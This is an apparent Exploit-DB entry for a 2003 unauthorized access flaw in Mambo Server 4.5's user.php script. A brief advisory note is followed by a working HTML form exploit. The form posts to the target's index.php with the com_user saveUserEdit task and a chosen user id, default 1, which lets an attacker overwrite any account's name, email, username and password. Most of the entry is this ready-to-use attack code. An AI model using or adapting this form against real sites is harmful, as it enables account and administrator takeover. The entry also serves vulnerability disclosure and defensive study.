Mambo 4.5 Server - 'user.php' Script Unauthorized Access

EDB-ID:

23428

CVE:


Author:

frog

Type:

webapps

Platform:

PHP

Published:

2003-12-10

source: http://www.securityfocus.com/bid/9193/info

It has been reported that Mambo Server may be prone to an unauthorized access vulnerability that may allow an attacker to modify a user and/or an administrator's information such as password, email, name etc, after supplying a legitimate user id.

Mambo Server version 4.5 Beta 1.0.3 has been reported to be vulnerable to this issue, however other versions could be affected as well. 

<html>
<head></head>
<body>
<form action="http://www.example.com/index.php" method="post">
New Name : <inputtype="text" name="name" value=""><br>
New E-mail : <input type="text" name="email" value="" size="30"><br>
New UserName : <input type="text" name="username" value=""><br>
New Password : <input type="password" name="password" value=""><br>
Verfiy New Pass : <input type="password" name="verifyPass"><br>
ID : <input type="text" name="id" value="1"><br>
<input type="hidden" name="option" value="com_user">
<input type="hidden" name="task" value="saveUserEdit">
<input type="submit" name="submit" value="Update"><br>
</form>
</body>
</html>